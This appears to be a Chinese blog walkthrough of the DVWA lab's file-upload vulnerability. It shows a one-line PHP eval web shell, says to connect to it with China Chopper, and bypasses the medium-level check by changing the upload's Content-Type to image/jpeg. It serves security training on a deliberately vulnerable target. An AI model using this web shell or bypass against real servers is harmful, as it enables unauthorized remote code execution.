文件上传漏洞(low,medium,high)

简介: 文件上传漏洞(low,medium,high)

一、环境:dvwa

二、选择Upload,low级别

1、上传1.php文件和1.jpg文件都没问题

PHP文件内容为:

<?php @eval($_POST["abc"]);?>

0a2653c851af460fa595bd959398a8f1.png

0eacb84100b54626af849e6b562bf92a.png

2、访问我们上传的文件

http://192.168.152.188/dvwa/hackable/uploads/1.jpg

可以看到图片

http://192.168.152.188/dvwa/hackable/uploads/1.php

什么都看不到

3、用菜刀链接1.php文件,点击添加

0a2653c851af460fa595bd959398a8f1.png0eacb84100b54626af849e6b562bf92a.png

4、双击链接进入

2d65d23f6d4748949b924e4057485923.png

三、选择Upload,medium级别

1、上传2.php文件和2.jpg文件,发现不能上传2.php

2、点击view source

0a2653c851af460fa595bd959398a8f1.png

3、这里限制了上传类型,抓包修改上传类型

0eacb84100b54626af849e6b562bf92a.png

4、我们将text/plain修改为image/jpeg,成功上传

2d65d23f6d4748949b924e4057485923.png

5、用菜刀链接一下

2e9b90b2ca334476abebe75bafe6eeaa.png

四、选择Upload,high级别

参考小课堂 – 文件包含漏洞

禁止非法,后果自负

目录
相关文章
|
网络协议 程序员
什么是回环地址
【5月更文挑战第16天】什么是回环地址
1747 0
|
SQL 存储 数据库
SQL语句是否都需要解析及其相关技巧与方法
在数据库管理系统中,SQL(Structured Query Language)语句作为与数据库交互的桥梁,其执行过程往往涉及到一个或多个解析阶段
|
算法 索引 容器
双指针算法详解
本文介绍了双指针算法及其应用。双指针算法是在数组或字符串中常用的高效技术,通过维护两个指针遍历数据结构以解决特定问题。根据指针移动方向,可分为同向双指针、相向双指针和快慢指针。同向双指针如移动零和复写零问题;快慢指针如快乐数问题;相向双指针如盛水最多的容器、有效三角形数量及多数之和等问题。通过合理运用双指针技巧,可简化代码并提高效率。
220 4
双指针算法详解
|
数据安全/隐私保护 Docker 容器
使用docker安装elastic search[ES]和kibana
使用docker安装elastic search[ES]和kibana
554 4
|
算法 Java Maven
关于OptaPlanner的使用(三)——运行代码案例
关于OptaPlanner的使用(三)——运行代码案例
530 0
异步神器CompletableFuture
异步神器CompletableFuture
|
JavaScript 前端开发
Webpack的基本配置和打包与介绍(一)⚡️
Webpack的基本配置和打包与介绍(一)⚡️
|
小程序 前端开发 物联网
微应用平台方案设想
微应用平台方案设想
424 0
leetcode:1408. 数组中的字符串匹配
leetcode:1408. 数组中的字符串匹配